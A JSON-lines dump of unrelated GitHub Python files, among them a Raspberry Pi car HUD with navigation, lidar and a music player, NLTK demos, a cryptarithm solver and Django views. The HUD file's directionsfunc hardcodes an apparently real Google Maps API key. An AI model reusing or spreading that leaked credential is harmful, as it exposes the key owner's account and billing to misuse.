pre_age_train_test = pre_age_train.drop(\"index\", axis=1)\n \n pre_age_mission_test_drop = pre_age_mission_test.drop(['id', 'age', 'country_destination'], axis=1)\n pre_age_train_test_drop = pre_age_train_test.drop(['id', 'age', 'country_destination'], axis=1)\n \n return pre_age_mission_test, pre_age_train_test, pre_age_mission, pre_age_train, pre_age_mission_test_drop, pre_age_train_test_drop\n\n\n# 
In[14]:\n\n\ndef pre_age_predict_data_cat(pre_age_train):\n    \n    bins = [0, 15, 25, 35, 60, 9999]\n    labels = [\"minor\", \"young adult\", \"middle-aged\", \"older adult\", \"elderly\"]\n    cats = pd.cut(pre_age_train['age'], bins, labels=labels)\n    cats = pd.DataFrame(cats)\n    \n    return cats\n\n\n# ### Age predict LightGBM\n\n# In[15]:\n\n\ndef predict_age_LightGBM(pre_age_train_test_drop, cats, pre_age_mission_test_drop):\n\n    X = pre_age_train_test_drop\n    y = cats\n    \n    model_age_lgb = lgb.LGBMClassifier(nthread=3)\n    model_age_lgb.fit(X,y)\n\n    print(classification_report(y, model_age_lgb.predict(pre_age_train_test_drop)))\n    model_age_lgb = model_age_lgb.predict(pre_age_mission_test_drop)\n    model_age_lgb = pd.DataFrame(model_age_lgb)\n    \n    return model_age_lgb\n\n\n# ### Age predict data make CSV","repo_name":"wjy5446/airbnb-new-booking","sub_path":"team_project/airpy/agd.py","file_name":"agd.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} {"seq_id":"27488646593","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer\n\ndef lemmatize_word(word):\n    # Initialize the WordNetLemmatizer\n    lemmatizer = WordNetLemmatizer()\n\n    # Perform lemmatization\n    lemma_word = lemmatizer.lemmatize(word)\n    # (without a pos argument WordNet assumes a noun, so \"running\" comes back\n    # unchanged; lemmatize(word, pos=\"v\") would yield \"run\")\n\n    return lemma_word\n\n# Example word\nword = \"running\"\n\n# Reduce the word to its lemma\nlemma_word = lemmatize_word(word)\n\n# Print the results\nprint(\"Original word:\", word)\nprint(\"Lemma:\", lemma_word)\n","repo_name":"xxrrnn/Reciting-words-based-on-notion-and-anki","sub_path":"TestFiles/test_nlp.py","file_name":"test_nlp.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} {"seq_id":"3861158091","text":"import urllib.request\nimport json\nimport time\nimport re\nimport obd\nimport overpy\nimport sys\nimport simplejson as json\nimport tkinter\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport serial\nimport subprocess\nimport os\nimport pygame\nimport threading\n\n#---------------------------------------- FUNCTIONS BEGIN ------------------------------------------------\n\ndef raise_frame(frame):\n    frame.tkraise()\n\ndef cleanhtml(raw_html):\n\tcleanr = re.compile('<.*?>')\n\tcleantext = re.sub(cleanr, '', raw_html)\n\treturn cleantext\n\ndef tick():\n    global time1\n    # get the current local time from the PC\n    time2 = time.strftime('%H:%M:%S')\n    # if time string has changed, update it\n    if time2 != time1:\n        time1 = time2\n        clock.config(text=time2)\n    # calls itself every 200 milliseconds\n    # to update the time display as needed\n    # could use >200 ms, but display gets jerky\n    clock.after(200, tick)\n\ndef printValuesSPEED():\n    global speed1\n    # get the current speed from the car\n    speed2 = speedConnection.query(obd.commands.SPEED)\n    # if the speed string has changed, update it\n    if speed2 != speed1:\n        speed1 = speed2\n        speed.config(text=speed2)\n    # calls itself every 200 milliseconds\n    # to update the speed display as needed\n    speed.after(200, printValuesSPEED)\n\n\ndef maxspeed(coordinates, radius):\n\tlat, lon = coordinates\n\tapi = overpy.Overpass()\n\n# fetch all ways and nodes\n\tresult = api.query(\"\"\"\n\t\t\tway(around:\"\"\" + str(radius) + \"\"\",\"\"\" + str(lat) + \"\"\",\"\"\" + str(lon) + \"\"\") [\"maxspeed\"];\n\t\t\t\t(._;>;);\n\t\t\t\t\tout body;\n\t\t\t\t\t \"\"\")\n\tresults_list = []\n\treturnspeed = 25\n\tfor way in result.ways:\n\t\troad = {}\n\t\troad[\"name\"] = way.tags.get(\"name\", \"n/a\")\n\t\troad[\"speed_limit\"] = way.tags.get(\"maxspeed\", \"n/a\")\n\t\t# i deleted the coordinates of the 
speed limits \n\t\t#nodes = []\n\t\t#for node in way.nodes:\n\t\t# nodes.append((node.lat, node.lon))\n\t\t#road[\"nodes\"] = nodes\n\t\tresults_list.append(road)\n\t\t# return just one value\n\tif results_list:\n\t\treturnspeed = (results_list[0]['speed_limit']).split(' ')[0]\n\n\treturn returnspeed\n# returning only one speed limit\n# do something where if there is no speed limit within 100 m of gps then return 0 to indicate no speed\n\ndef raise_frame_special(frame):\n frame.tkraise()\n directionsfunc()\n\ndef directionsfunc():\n\t# raise_frame(f5)\n\torigin= entry.get()\n\tdestination=entry2.get()\n\t#Google MapsDdirections API endpoint\n\tendpoint = 'https://maps.googleapis.com/maps/api/directions/json?'\n\tapi_key = 'AIzaSyAtnTpeJXirzSS7CRGaIntlXDcJ6V14EGM'\n\torigin = origin.replace(' ','+')\n\tdestination = destination.replace(' ','+')\n\t#Building the URL for the request\n\tnav_request = 'origin={}&destination={}&key={}'.format(origin,destination,api_key)\n\trequest = endpoint + nav_request\n\t#Sends the request and reads the response.\n\tresponse = urllib.request.urlopen(request).read()\n\t#Loads response as JSON\n\tdirections = json.loads(response.decode('utf-8'))\n\tlegs = directions['routes'][0]['legs']\n\t#iterate through the steps and print the html instructions (which are the directions) print distance for length of each step\n\tglobal stepslen\n\tstepslen= len(legs[0]['steps'])\n\t# define lists as the global ones\n\tglobal step_distance_list\n\tglobal step_duration_list\n\tglobal step_startloc_lat_list\n\tglobal step_startloc_lng_list\n\tglobal step_endloc_lat_list\n\tglobal step_endloc_lng_list\n\tglobal step_html_list\n\tglobal step_maneuver_list\n\n\n\n\t# clear the lists \n\tdel step_distance_list[:]\n\tdel step_duration_list[:]\n\tdel step_startloc_lat_list[:]\n\tdel step_startloc_lng_list[:]\n\tdel step_endloc_lat_list[:]\n\tdel step_endloc_lng_list[:]\n\tdel step_html_list[:]\n\tdel step_maneuver_list[:]\n\tfor x in range(stepslen):\n\t\ta=legs[0]['steps'][x]['distance']['text']\n\t\tstep_distance_list.append(a)\n\t\ta=(legs[0]['steps'][x]['duration']['text']).split(' ')[0]\n\t\tstep_duration_list.append(a)\n\t\ta=legs[0]['steps'][x]['start_location']['lat']\n\t\tstep_startloc_lat_list.append(a)\n\t\ta=legs[0]['steps'][x]['start_location']['lng']\n\t\tstep_startloc_lng_list.append(a)\n\t\ta=legs[0]['steps'][x]['end_location']['lat']\n\t\tstep_endloc_lat_list.append(a)\n\t\ta=legs[0]['steps'][x]['end_location']['lng']\n\t\tstep_endloc_lng_list.append(a)\n\t\ta=legs[0]['steps'][x]['html_instructions']\n\t\ta=cleanhtml(a)\n\t\tstep_html_list.append(a)\n\t\tif ('maneuver' not in legs[0]['steps'][x]):\t\t\n\t\t\tstep_maneuver_list.append('none')\n\t\telse:\n\t\t\ta=legs[0]['steps'][x]['maneuver']\n\t\t\tstep_maneuver_list.append(a)\t\n\t\n\tfor x in range(stepslen):\n\t\tprintdirections(x)\t\n\n\traise_frame(f5)\n\n\tline1= Label(f5,bg='black',fg='white')\n\tline2= Label(f5,bg='black',fg='white')\n\tline3= Label(f5,bg='black',fg='white')\n\t# line4= Label(f5,bg='black',fg='white')\n\tline5= Label(f5,bg='black',fg='white')\n\n\tpath=\"none.jpg\"\n\timg=Image.open(path)\n\t# img=img.resize((80,80),Image.ANTIALIAS)\n\tph=ImageTk.PhotoImage(img)\n\tline4=tkinter.Label(f5, image=ph, borderwidth=0, highlightthickness=0)\n\tline4.image=ph\n\n\tline1.pack()\n\tline2.pack()\n\tline5.pack()\n\tline4.pack()\n\tline3.pack()\n\n\tupdate_status(0,line1,line2, line3, line4, line5)\n\n\treturn None \n\n\ndef update_status(instructionholder,line1,line2, line3, line4, 
line5):\n\n\tline1[\"text\"]=step_html_list[instructionholder]\n\tline2[\"text\"]=\"Total Distance:\" + step_distance_list[instructionholder]\n\tline5[\"text\"]=\"Distance Remaining: 0.1 miles\"\n\tline3[\"text\"]=\"Current Speed Limit: 25 MPH\" # + str(maxspeed((40.516972, -74.435804),50))\n\n\timg=ImageTk.PhotoImage(Image.open(step_maneuver_list[instructionholder]+\".jpg\"))\n\tline4.configure(image=img)\n\tline4.image=img\n\n\tf5.update()\n\n\tprint(instructionholder)\n\tinstructionholder=instructionholder+1\n\n\tif(instructionholder>=stepslen):\n\t\treturn None\n\n\t# Pass the callback and its arguments to after() separately; calling\n\t# update_status(...) inline would run it immediately (blocking the UI)\n\t# and hand after() only its None return value.\n\troot.after(10000, update_status, instructionholder, line1, line2, line3, line4, line5)\n\ndef printdirections(x):\n\t#print the array you want\n\tprint(str(x)+\":\"+ step_distance_list[x])\n\tprint(str(x)+\":\"+ step_duration_list[x])\n\tprint(str(x)+\":\"+ str(step_startloc_lat_list[x]))\n\tprint(str(x)+\":\"+ str(step_startloc_lng_list[x]))\n\tprint(str(x)+\":\"+ str(step_endloc_lat_list[x]))\n\tprint(str(x)+\":\"+ str(step_endloc_lng_list[x]))\n\tprint(str(x)+\":\"+ step_html_list[x])\n\tprint(str(x)+\":\"+ step_maneuver_list[x])\n\treturn None \n\n\ndef leftKey(event):\n\t\n\tglobal currentframe\n\t\t\n\tif (currentframe==1):\n\t\tcurrentframe=7\n\t\traise_frame(f7)\n\n\telif (currentframe==2):\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\telif (currentframe==3):\n\t\tcurrentframe=2\n\t\traise_frame(f2)\n\n\telif (currentframe==4):\n\t\tcurrentframe=3\n\t\traise_frame(f3)\n\telif (currentframe==6):\n\t\tcurrentframe=4\n\t\traise_frame(f4)\n\telif (currentframe==7):\n\t\tcurrentframe=6\n\t\traise_frame(f6)\n\telse:\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\tprint(\"Left Key pressed\")\n\n\ndef rightKey(event):\n\n\tglobal currentframe\n\n\tif (currentframe==1):\n\t\tcurrentframe=2\n\t\traise_frame(f2)\n\n\telif (currentframe==2):\n\t\tcurrentframe=3\n\t\traise_frame(f3)\n\n\telif (currentframe==3):\n\t\tcurrentframe=4\n\t\traise_frame(f4)\n\n\telif (currentframe==4):\n\t\tcurrentframe=6\n\t\traise_frame(f6)\n\telif (currentframe==6):\n\t\tcurrentframe=7\n\t\traise_frame(f7)\n\telif (currentframe==7):\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\telse:\n\t\tcurrentframe=1\n\t\traise_frame(f1)\n\n\tprint(\"Right key pressed\")\n\nglobe_lati=1234\nglobe_long=5678\n\ndef use_cur_location():\n\tglobal globe_lati\n\tglobal globe_long\n\tentry.delete(0,END)\n\tentry.insert(0, str(globe_lati)+\",\"+str(globe_long))\n\n\n# ------------------- LIDAR CODE --------------------------- \n\n\nroot=Tk()\n\n\nlidar_distance=100.0\nlidar_distancelabel=IntVar()\nlidar_distancelabel.set(0)\n\ncurrent_speed=0\n\ndef run_lidar():\n    ser = serial.Serial('/dev/ttyUSB1',115200,timeout = 1)\n    # configuration command; note bytes([n]) sends the single byte n,\n    # whereas bytes(n) would send n zero bytes\n    ser.write(b'B')\n    ser.write(b'W')\n    ser.write(bytes([2]))\n    ser.write(bytes([0]))\n    ser.write(bytes([0]))\n    ser.write(bytes([0]))\n    ser.write(bytes([1]))\n    ser.write(bytes([6]))\n\n    global lidar_distance\n    global current_speed\n\n    while(True):\n        time.sleep(1)\n        while(ser.in_waiting >= 9):\n            if((b'Y' == ser.read()) and ( b'Y' == ser.read())):\n                Dist_L = ser.read()\n                Dist_H = ser.read()\n                Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))\n                for i in range (0,5):\n                    ser.read()\n                lidar_distance=Dist_Total/30.48\n                lidar_distancelabel.set(lidar_distance)\n                if lidar_distance < 5 :\n                    pygame.mixer.init()\n                    pygame.mixer.music.load(\"beep.mp3\")\n                    pygame.mixer.music.play()\n                    while pygame.mixer.music.get_busy() == True:\n                        continue\n                print(lidar_distance)\n\nt=threading.Thread(target=run_lidar)\nt.daemon=True\nt.start()\n\n
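# Added sketch: once the b'YY' header is matched, the remaining frame bytes\n# could, I believe, be unpacked in one step with the stdlib struct module\n# (a hypothetical equivalent of the byte-by-byte reads above):\n#   import struct\n#   rest = ser.read(7)                                  # dist, strength, mode, checksum\n#   dist_cm, strength = struct.unpack('<HH', rest[:4])  # little-endian u16s\n# The trailing checksum byte is ignored here, just as in the loop above.\n\n# ------------------- GPS CODE 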
--------------------------- \n\ndef getLat():\n\n\tpython3_command = \"python getLat.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error = process.communicate()\n\toutput=output.decode('utf8')\n\treturn(output)\n\ndef getLon():\n\n\tpython3_command = \"python getLon.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error = process.communicate()\n\toutput=output.decode('utf8')\n\treturn(output)\n\ncurrent_speed_label=IntVar()\ncurrent_speed_label.set(0)\n\n\ndef getSpeed():\n\n\tpython3_command = \"python getSpeed.py\"\n\tprocess=subprocess.Popen(python3_command.split(), stdout=subprocess.PIPE)\n\toutput, error= process.communicate()\n\toutput=output.decode('utf8')\n\tglobal current_speed\n\tcurrent_speed=output\n\tcurrent_speed_label.set(output)\n\treturn(output)\n\n\nspeedthread=threading.Thread(target=getSpeed)\nspeedthread.daemon=True\nspeedthread.start()\n\n\n# -------------------- MUSIC PLAYER CODE ------------------\n\n\n\n\n\n\n\n\n#---------------------------------------- FUNCTIONS END ------------------------------------------------\n\n\nroot.title('THUD')\n\n\nroot.geometry('{}x{}'.format(800,480))\nroot.configure(bg='black')\n\n\nf1 = Frame(root,width=800, height=480)\nf2 = Frame(root,width=800, height=480)\nf3 = Frame(root,width=800, height=480)\nf4 = Frame(root,width=800, height=480)\nf5 = Frame(root,width=800, height=480)\nf6 = Frame(root,width=800, height=480)\nf7 = Frame(root,width=800, height=480)\n\n\ncurrentframe = 1\n\nf1.configure(bg='black')\nf2.configure(bg='black')\nf3.configure(bg='black')\nf4.configure(bg='black')\nf5.configure(bg='black')\nf6.configure(bg='black')\nf7.configure(bg='black')\n\n\nfor frame in (f1, f2, f3, f4, f5, f6, f7):\n frame.grid(row=0, column=0, sticky='news')\n\n\n\nstepslen=0\nstep_distance_list = []\nstep_duration_list = []\nstep_startloc_lat_list = []\nstep_startloc_lng_list = []\nstep_endloc_lat_list = []\nstep_endloc_lng_list = []\nstep_html_list= []\nstep_maneuver_list = []\n\n\n#----------------------------------------------- FRAME 1 --------------------------------------------------------------------------------------\n\nLabel(f1,text='NAVIGATION',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,padx=170,pady=10)\nLabel(f1,text='Starting Point?',bg='black',fg='white',font=(\"Courier New\",18)).pack(side=TOP,padx=170,pady=10)\nbuttonfirst1=Button(f1, highlightbackground='black',text='Use Current Location',font=(\"Courier New\",18),command=use_cur_location).pack(expand=True, pady=5)\n\nentry = Entry(f1)\nentry.pack(side=TOP,padx=170,pady=10)\n\nLabel(f1,text='Final Destination?',bg='black',fg='white',font=(\"Courier New\",18)).pack(side=TOP,padx=170,pady=10)\n\nentry2 = Entry(f1)\nentry2.pack(side=TOP,padx=170,pady=10)\n\n\nbutton1=Button(f1, highlightbackground='black', text='Get Directions',font=(\"Courier New\",18), command=lambda:raise_frame_special(f5)).pack(expand=True,pady=5)\n\n\n\n#-------------------------------------------------- FRAME 2 --------------------------------------------------------------------------------\n\n\nLabel(f2,text='TIME',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10,padx=170)\n\ntime1 = ''\nclock = Label(f2, font=('times', 100, 'bold'), bg='black', fg='white')\nclock.pack(fill=BOTH, expand=1)\n\ntick()\n\n\n\n\n\n#----------------------------------------------------- FRAME 3 
--------------------------------------------------------------------------------\n\n\n\nLabel(f3,text='SPEED', bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f3,textvariable=current_speed_label, bg='black',fg='white',font=(\"Courier New\",70)).pack(side=TOP,pady=10,padx=170)\nprint(current_speed_label.get())\nLabel(f3,text='MPH',bg='black',fg='white',font=(\"Courier New\",44)).pack(side=TOP,pady=10,padx=170)\n# button5=Button(f3, highlightbackground='black', text='Go to frame 4', command=lambda:raise_frame(f4)).pack(pady=50)\n\n\n\n#---------------------------------------------------- FRAME 4 ---------------------------------------------------------------------------------\n\nLabel(f4,text='OBD DIAGNOSTICS',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f4,text='No alerts at this moment!',bg='black',fg='white',font=(\"Courier New\",26)).pack(side=TOP,pady=20)\n\n\n\n\n#---------------------------------------------------- FRAME 5 ---------------------------------------------------------------------------------\n\n\nLabel(f5,text='DIRECTIONS',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\n\n\n\n\n\n\n# MUSIC PLAYER CODE\nLabel(f6,text='MUSIC PLAYER',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\n\nlistofsongs = []\nv = StringVar()\nsonglabel = Label(f6,textvariable=v,width=35)\nindex = 0\n\n\n\n\ndef directorychooser():\n    directory=\"/home/pi/Desktop\"\n    os.chdir(directory)\n\n    for files in os.listdir(directory):\n        if files.endswith(\".mp3\"):\n            listofsongs.append(files)\n\n    pygame.mixer.init()\n    pygame.mixer.music.load(listofsongs[0])\n    pygame.mixer.music.play()\n\ndirectorychooser()\n\ndef updatelabel():\n    global index\n    global songname\n    v.set(listofsongs[index])\n\ndef nextsong(event):\n    global index\n    if index < len(listofsongs)-1:\n        index += 1\n    else:\n        index = 0\n    pygame.mixer.music.load(listofsongs[index])\n    pygame.mixer.music.play()\n    updatelabel()\n\ndef prevsong(event):\n    global index\n    if index > 0:\n        index -= 1\n    else:\n        index=len(listofsongs)-1\n    pygame.mixer.music.load(listofsongs[index])\n    pygame.mixer.music.play()\n    updatelabel()\n\ndef stopsong(event):\n    pygame.mixer.music.stop()\n    v.set(\"\")\n\ndef playsong(event):\n    pygame.mixer.init()\n    pygame.mixer.music.load(listofsongs[index])\n    pygame.mixer.music.play()\n    updatelabel()\n\nlistbox = Listbox(f6)\nlistbox.pack()\n\nlistofsongs.reverse()\n\nfor items in listofsongs:\n    listbox.insert(0,items)\n\nlistofsongs.reverse()\n\nnextbutton = Button(f6,text = 'Next Song')\nnextbutton.pack()\n\npreviousbutton = Button(f6,text = 'Previous Song')\npreviousbutton.pack()\n\nstopbutton = Button(f6,text='Stop Music')\nstopbutton.pack()\n\nplaybutton = Button(f6,text='Play Music')\nplaybutton.pack()\n\n\n\n# LIDAR CODE\n\nLabel(f7,text='LIDAR TEST',bg='black',fg='white',font=(\"Courier New\",20)).pack(side=TOP,pady=10)\nLabel(f7,textvariable=lidar_distancelabel,bg='black',fg='white',font=(\"Courier New\",70)).pack(side=TOP,pady=10)\nLabel(f7,text='Feet',bg='black',fg='white',font=(\"Courier 
New\",44)).pack(side=TOP,pady=10)\n\n\n#-------------------------------------------------------------------------------------------------------------------------------------------\n\n\nraise_frame(f1)\n\n\nroot.bind('',leftKey)\nroot.bind('',rightKey)\n\nnextbutton.bind(\"\",nextsong)\npreviousbutton.bind(\"\",prevsong)\nstopbutton.bind(\"\",stopsong)\nplaybutton.bind(\"\",playsong)\nsonglabel.pack()\n\nroot.mainloop()\n\n\n","repo_name":"Harshpatel40/HUD","sub_path":"mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":15520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1670954642","text":"\n\ndef get_mask(i):\n if i == 8:\n s,e,n,d,m,o,r,y = a[:8]\n send = 1000*s + 100*e + 10*n + d\n more = 1000*m + 100*o + 10*r + e\n money = 10000*m + 1000*o + 100*n + e*10 + y\n if (s != 0 and m != 0) and (send + more == money):\n print(send, more, money)\n print(s,e,n,d,m,o,r,y)\n\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n get_mask(i+1)\n a[i], a[j] = a[j], a[i]\n\n\ndef str_mask(i, x=''):\n if i == 8:\n s,e,n,d,m,o,r,y = x\n send = int(s+e+n+d)\n more = int(m+o+r+e)\n money = int(m+o+n+e+y)\n if (s != '0' and m != '0') and (send + more == money):\n print(send, more, money)\n print(x)\n\n\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n str_mask(i+1, x+a[i])\n a[i], a[j] = a[j], a[i]\n\n\n\n\ndef find_mask(i, x=''):\n # permutation complete\n if i == len(chars):\n # now assess if the assigned num-to-char is valid\n \n # apply permutation to the dictionary\n d = dict(zip(chars, x))\n # for k, v in enumerate(x):\n # d[chars[k]] = v\n \n word1 = ''\n word2 = '' \n word3 = ''\n for c in w1:\n word1 += d[c]\n for c in w2:\n word2 += d[c]\n for c in w3:\n word3 += d[c]\n \n # check if number is valid for each word (remove numbers with 0 start)\n # and satisfies the addition\n if ((word1[0] != '0' and word2[0] != '0' and word3[0] != '0') \n and (int(word1) + int(word2) == int(word3))):\n print(word1, word2, word3)\n\n # find all permutations of number-to-character\n for j in range(i, digit):\n a[i], a[j] = a[j], a[i]\n find_mask(i+1, x+a[i])\n a[i], a[j] = a[j], a[i]\n \n \n\n# digits\ndigit = 10\na = [str(i) for i in range(digit)]\n\nd = {}\n# assume all input will come in the following form in 1 line:\n# word1 word2 word3\n# and operation is always addition\n# ie. 
word1 + word2 = word3\n\n# w1, w2, w3 = input().split()\ninput = input().split()  # rebinds the name input to the token list; the builtin is shadowed from here on\n\n# find unique characters of input\nchars = []\nw1 = input[0]\nw2 = input[1]\nw3 = input[2]\nfor w in input:\n    for c in w:\n        if c not in chars:\n            chars.append(c)\nprint(chars)\n\n# use set to extract unique characters\nset_chars = list(set(w1+w2+w3)) \nprint(set_chars)\n# drive code\nfind_mask(0)\n\n# get_mask(0)\n# str_mask(0)\n","repo_name":"yehyunchoi/Algorithm","sub_path":"prev_problems/mask_number.py","file_name":"mask_number.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} {"seq_id":"33953803281","text":"import nltk.classify.util\nfrom nltk.classify import NaiveBayesClassifier\nfrom nltk.corpus import product_reviews_1\nfrom nltk import precision, recall\nimport AspectFinder\nimport collections\n\n\ndef word_feats(words):\n    return dict([(word, True) for word in words])\n\ndef evaluate_classifier(classifier):\n    aspects = AspectFinder.AspectFinder().get_aspects()\n\n    minus = [f for f in aspects if f[1][0]==\"-\"]\n    plus = [f for f in aspects if f[1][0]==\"+\"]\n\n    sentences = [' '.join(s) for s in product_reviews_1.sents()]\n\n    minusfeats = [(word_feats(s.split()), '-') for s in sentences for f in minus if s.find(f[0])!=-1]\n    plusfeats = [(word_feats(s.split()), '+') for s in sentences for f in plus if s.find(f[0])!=-1]\n\n    minuscutoff = int(len(minusfeats)*3/4)\n    pluscutoff = int(len(plusfeats)*3/4)\n\n    trainfeats = minusfeats[:minuscutoff] + plusfeats[:pluscutoff]\n    testfeats = minusfeats[minuscutoff:] + plusfeats[pluscutoff:]\n    print('train on %d instances, test on %d instances' % (len(trainfeats), len(testfeats)))\n\n\n    classifier = train(classifier, trainfeats)\n    refsets = collections.defaultdict(set)\n    testsets = collections.defaultdict(set)\n\n    for i, (feats, label) in enumerate(testfeats):\n        refsets[label].add(i)\n        observed = classifier.classify(feats)\n        testsets[observed].add(i)\n\n    # the labels assigned above are '+' and '-', so the sets must be indexed with those keys\n    print('accuracy:', nltk.classify.util.accuracy(classifier, testfeats))\n    print('pos precision:', precision(refsets['+'], testsets['+']))\n    print('pos recall:', recall(refsets['+'], testsets['+']))\n    print('neg precision:', precision(refsets['-'], testsets['-']))\n    print('neg recall:', recall(refsets['-'], testsets['-']))\n    classifier.show_most_informative_features()\n    print(classifier.classify(word_feats([\"I\", \"hate\", \"it\", \".\"])))\n    print(classifier.classify(word_feats([\"I\", \"love\", \"it\", \".\"])))\n\ndef train(classifier, trainfeats, traintargets=[]):\n    try:\n        classifier = classifier.train(trainfeats)\n    except AttributeError:\n        classifier = classifier.fit(trainfeats, traintargets)\n\n    return classifier\n\nif __name__ == '__main__':\n    evaluate_classifier(NaiveBayesClassifier)","repo_name":"frederikflpl/BACode","sub_path":"SentimentAnalyzer.py","file_name":"SentimentAnalyzer.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} {"seq_id":"15030196797","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post, Page, BlogTitle\n\nPAGES = Page.objects.all()\nTITLE = BlogTitle.objects.all()\nif TITLE:\n    TITLE = TITLE[0]\nelse:\n    TITLE = BlogTitle()\n\ndef post_list(request):\n    posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n    return render(request, 'blog/post_list.html', {'posts': posts, 'pages': 
PAGES, 'title': TITLE})\n\ndef post_detail(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/post_detail.html', {'post': post, 'pages': PAGES, 'title': TITLE})\n\ndef page(request, pg):\n page = get_object_or_404(Page, title=pg)\n return render(request, 'blog/page.html', {'page': page, 'pages': PAGES, 'title': TITLE})\n\ndef handler404(request):\n response = render(request, 'blog/404.html', {'pages': PAGES, 'title': TITLE})\n response.status_code = 404\n return response","repo_name":"Nick-the-BinaryTree/dropshadow","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29697502496","text":"from __future__ import division\nimport logging\nimport modules.Config as cfg\nfrom kivy.uix.button import Button\n\n\nclass Plr:\n\n def __init__(self, num):\n self.logger = logging.getLogger('driver.modules.Plrs.Plr')\n self.num = num + 1\n self.x = 0 - num - 1\n self.y = 0 - num - 1\n self.status = cfg.PLR_WAITING\n self.printChar = cfg.PLR_POINT\n self.button = Button()\n\n info = self.PrintPlr()\n self.logger.info('# Initializing plr: %s' % info)\n\n def getButton(self):\n\n return self.button\n\n def setButton(self):\n\n self.button = Button(\n text='%s' % (self.num),\n size_hint=((1 / cfg.GRID_SIZE), (1 / cfg.GRID_SIZE)),\n background_color=[3,2,1,3],\n font_size=9,\n pos=(self.x * cfg.BLOCK_SIZE, self.y * cfg.BLOCK_SIZE + (2 * cfg.BLOCK_SIZE)))\n\n def PrintPlr(self):\n return('id: %s, printChar: %s, x: %s, y: %s' % (self.num, self.printChar, self.x, self.y))\n","repo_name":"jwgreene1/Grid","sub_path":"modules/Plrs.py","file_name":"Plrs.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6906030961","text":"from django.shortcuts import redirect, render\nimport json\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom eqrApp import models, forms\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login, logout, update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\n\n\n\ndef context_data():\n context = {\n 'page_name' : '',\n 'page_title' : 'Proyecto',\n 'system_name' : 'Detector y generador de codigo QR y de barras',\n 'topbar' : True,\n 'footer' : True,\n }\n\n return context\n\n\n# Create your views here.\ndef login_page(request):\n context = context_data()\n context['topbar'] = False\n context['footer'] = False\n context['page_name'] = 'login'\n context['page_title'] = 'Login'\n return render(request, 'login.html', context)\n\ndef login_user(request):\n logout(request)\n resp = {\"status\":'failed','msg':''}\n username = ''\n password = ''\n if request.POST:\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n resp['status']='success'\n else:\n resp['msg'] = \"Nombre de usuario o contraseña incorrecto\"\n else:\n resp['msg'] = \"Nombre de usuario o contraseña incorrecto\"\n return HttpResponse(json.dumps(resp),content_type='application/json')\n\n@login_required\ndef home(request):\n context = context_data()\n context['page'] = 'home'\n context['page_title'] = 'Home'\n context['employees'] = models.Employee.objects.count()\n return 
render(request, 'home.html', context)\n\ndef logout_user(request):\n logout(request)\n return redirect('login-page')\n\n\n@login_required\ndef employee_list(request):\n context =context_data()\n context['page'] = 'Listado Vcard'\n context['page_title'] = 'Listado de Vcard'\n context['employees'] = models.Employee.objects.all()\n\n return render(request, 'employee_list.html', context)\n\n@login_required \ndef manage_employee(request, pk=None):\n context =context_data()\n if pk is None:\n context['page'] = 'Añadir_Vcard'\n context['page_title'] = 'Añadir Vcard'\n context['employee'] = {}\n else:\n context['page'] = 'Editar_vcard'\n context['page_title'] = 'Actualizar Vcard'\n context['employee'] = models.Employee.objects.get(id=pk)\n\n return render(request, 'manage_employee.html', context)\n\n@login_required\ndef save_employee(request):\n resp = { 'status' : 'failed', 'msg' : '' }\n if not request.method == 'POST':\n resp['msg'] = \"No se han enviado datos a la solicitud.\"\n\n else:\n if request.POST['id'] == '':\n form = forms.SaveEmployee(request.POST, request.FILES)\n else:\n employee = models.Employee.objects.get(id = request.POST['id'])\n form = forms.SaveEmployee(request.POST, request.FILES, instance = employee)\n if form.is_valid():\n form.save()\n if request.POST['id'] == '':\n messages.success(request, f\"{request.POST['codigo_empleado']} se ha añadido con éxito.\")\n else:\n messages.success(request, f\"{request.POST['codigo_empleado']} se ha actualizado correctamente.\")\n resp['status'] = 'success'\n else:\n for field in form:\n for error in field.errors:\n if not resp['msg'] == '':\n resp['msg'] += str(\"
